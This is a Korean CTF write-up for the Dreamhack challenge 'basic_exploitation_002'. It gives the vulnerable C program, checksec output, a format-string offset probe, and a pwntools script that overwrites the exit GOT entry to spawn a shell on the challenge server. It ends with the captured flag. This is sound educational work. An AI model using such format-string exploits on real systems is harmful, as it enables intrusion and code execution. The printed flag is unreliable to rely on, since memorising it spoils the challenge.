문제 코드
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void alarm_handler() {
puts("TIME OUT");
exit(-1);
}
void initialize() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
signal(SIGALRM, alarm_handler);
alarm(30);
}
void get_shell() {
system("/bin/sh");
}
int main(int argc, char *argv[]) {
char buf[0x80];
initialize();
read(0, buf, 0x80);
printf(buf);
exit(0);
}- 쉘을 띄워주는
get_shell()함수가 있습니다. printf(buf)부분에서 포멧 스트링 버그가 발생합니다.exit()함수의got를get_shell()함수의got로overwrite하면 쉘을 띄울 수 있습니다.
보호 기법
ion ~/wargame/dreamhack/pwnable/basic_exploitation_002 checksec basic_exploitation_002
[*] '/home/ion/wargame/dreamhack/pwnable/basic_exploitation_002/basic_exploitation_002'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)NX 방어기법이 걸려있습니다.
오프셋 구하기
ion ~/wargame/dreamhack/pwnable/basic_exploitation_002 ./basic_exploitation_002
AAAA %p %p %p %p %p
AAAA 0x41414141 0x20702520 0x25207025 0x70252070 0xa702520바로 0x41414141 이 출력되기 때문에 오프셋은 1입니다.
익스플로잇 코드
from pwn import *
#context.log_level = 'debug'
p = remote("host3.dreamhack.games", 8904)
e = ELF("./basic_exploitation_002")
exit_got = e.got['exit']
get_shell = e.symbols['get_shell']
payload = fmtstr_payload(1, {exit_got:get_shell})
p.sendline(payload)
p.interactive()익스플로잇
ion ~/wargame/dreamhack/pwnable/basic_exploitation_002 python3 exploit.py
[+] Opening connection to host3.dreamhack.games on port 8904: Done
[*] '/home/ion/wargame/dreamhack/pwnable/basic_exploitation_002/basic_exploitation_002'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[*] Switching to interactive mode
%9 na'\xa0\x04$\xa0\x04%\xa0\x04
$ ls
basic_exploitation_002
flag
$ cat flag
DH{59c4a03eff1e4c10c87ff123fb93d56c}